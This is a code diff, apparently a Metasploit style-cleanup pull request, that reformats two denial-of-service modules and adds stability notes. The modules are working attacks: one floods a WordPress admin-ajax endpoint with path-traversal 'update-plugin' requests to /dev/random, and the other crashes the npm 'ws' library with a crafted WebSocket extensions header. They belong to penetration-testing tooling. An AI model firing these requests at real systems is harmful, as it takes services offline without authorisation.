+    )
   end
 
   def rlimit
@@ -67,73 +74,70 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def user_exists(user)
-    exists = wordpress_user_exists?(user)
-    if exists
+    if wordpress_user_exists?(user)
       print_good("Username \"#{user}\" is valid")
       return true
-    else
-      print_error("\"#{user}\" is not a valid username")
-      return false
     end
+
+    print_error("\"#{user}\" is not a valid username")
+    return false
   end
 
   def run
     if wordpress_and_online?
-      print_status("Checking if user \"#{username}\" exists...")
-      unless user_exists(username)
-        print_error('Aborting operation - a valid username must be specified')
-        return
-      end
-
-      starting_thread = 1
-
-      cookie  = wordpress_login(username, password)
-      store_valid_credential(user: username, private: password, proof: cookie)
-      if cookie.nil?
-        print_error('Aborting operation - failed to authenticate')
-        return
-      end
-
-      path = "/#{'../' * depth}dev/random"
-
-      while starting_thread < rlimit do
-        ubound = [rlimit - (starting_thread - 1), thread_count].min
-        print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
-
-        threads = []
-        1.upto(ubound) do |i|
-          threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
-            begin
-              # shell code
-              res = send_request_cgi( opts = {
-                'method' => 'POST',
-                'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
-                'vars_post' => {
-                  'action' => 'update-plugin',
-                  'plugin' => path
-                },
-                'cookie' => cookie
-              }, timeout = 0.2)
-            rescue => e
-              print_error("Timed out during request #{(starting_thread - 1) + i}")
-            end
-          end
-        end
-
-        threads.each(&:join)
-
-        print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
-        starting_thread += ubound
-      end
-
-      if wordpress_and_online?
-        print_error("FAILED: #{target_uri} appears to still be online")
-      else
-        print_good("SUCCESS: #{target_uri} appears to be down")
-      end
-
-    else
       print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")
+      return
+    end
+
+    print_status("Checking if user \"#{username}\" exists...")
+    unless user_exists(username)
+      print_error('Aborting operation - a valid username must be specified')
+      return
+    end
+
+    starting_thread = 1
+
+    cookie = wordpress_login(username, password)
+    store_valid_credential(user: username, private: password, proof: cookie)
+    if cookie.nil?
+      print_error('Aborting operation - failed to authenticate')
+      return
+    end
+
+    path = "/#{'../' * depth}dev/random"
+
+    while starting_thread < rlimit
+      ubound = [rlimit - (starting_thread - 1), thread_count].min
+      print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
+
+      threads = []
+      1.upto(ubound) do |i|
+        threads << framework.threads.spawn("Module(#{refname})-request#{(starting_thread - 1) + i}", false, i) do |_t|
+          # shell code
+          send_request_cgi({
+            'method' => 'POST',
+            'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
+            'vars_post' => {
+              'action' => 'update-plugin',
+              'plugin' => path
+            },
+            'cookie' => cookie
+          }, 0.2)
+        rescue StandardError
+          print_error("Timed out during request #{(starting_thread - 1) + i}")
+        end
+      end
+
+      threads.each(&:join)
+
+      print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
+      starting_thread += ubound
+    end
+
+    if wordpress_and_online?
+      print_error("FAILED: #{target_uri} appears to still be online")
+    else
+      print_good("SUCCESS: #{target_uri} appears to be down")
     end
   end
 end

--- a/modules/auxiliary/dos/http/ws_dos.rb
+++ b/modules/auxiliary/dos/http/ws_dos.rb
@@ -9,60 +9,62 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'ws - Denial of Service',
-      'Description'    => %q{
+      'Name' => 'ws - Denial of Service',
+      'Description' => %q{
           This module exploits a Denial of Service vulnerability in npm module "ws".
         By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash.
       },
-      'References'     =>
-        [
-          ['URL', 'https://nodesecurity.io/advisories/550'],
-          ['CWE', '400'],
-        ],
-      'Author'         =>
-        [
-          'Ryan Knell,  Sonatype Security Research',
-          'Nick Starke, Sonatype Security Research',
-        ],
-      'License'        =>  MSF_LICENSE
+      'References' => [
+        ['URL', 'https://nodesecurity.io/advisories/550'],
+        ['CWE', '400'],
+      ],
+      'Author' => [
+        'Ryan Knell,  Sonatype Security Research',
+        'Nick Starke, Sonatype Security Research',
+      ],
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SERVICE_DOWN],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
 
     register_options([
       Opt::RPORT(3000),
       OptString.new('TARGETURI', [true, 'The base path', '/']),
-    ],)
+    ])
   end
 
   def run
     path = datastore['TARGETURI']
 
-    #Create HTTP request
+    # Create HTTP request
     req = [
       "GET #{path} HTTP/1.1",
-      "Connection: Upgrade",
-      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(rand(10) + 5).to_s}",
-      "Sec-WebSocket-Version: 8",
-      "Sec-WebSocket-Extensions: constructor",  #Adding "constructor" as the value for this header causes the DoS
-      "Upgrade: websocket",
+      'Connection: Upgrade',
+      "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(5..14)}",
+      'Sec-WebSocket-Version: 8',
+      'Sec-WebSocket-Extensions: constructor', # Adding "constructor" as the value for this header causes the DoS
+      'Upgrade: websocket',
       "\r\n"
-      ].join("\r\n");
+    ].join("\r\n")
 
     begin
       connect
       print_status("Sending DoS packet to #{peer}")
       sock.put(req)
 
-      data = sock.get_once(-1)  #Attempt to retrieve data from the socket
+      data = sock.get_once(-1) # Attempt to retrieve data from the socket
 
-      if data =~ /101/   #This is the expected HTTP status code. IF it's present, we have a valid upgrade response.
-        print_error("WebSocket Upgrade request Successful, service not vulnerable.")
+      if data =~ /101/ # This is the expected HTTP status code. IF it's present, we have a valid upgrade response.
+        print_error('WebSocket Upgrade request Successful, service not vulnerable.')
       else
-        fail_with(Failure::Unknown, "An unknown error occurred")
+        fail_with(Failure::Unknown, 'An unknown error occurred')
       end
 
       disconnect
-      print_error("DoS packet unsuccessful")
-
+      print_error('DoS packet unsuccessful')
     rescue ::Rex::ConnectionRefused
       print_error("Unable to connect to #{peer}")
     rescue ::Errno::ECONNRESET, ::EOFError


### PR DESCRIPTION
Most violations resolved with `rubocop -A`, except notes.

Arguably these should also include `IOC_IN_LOGS` in `SideEffects`.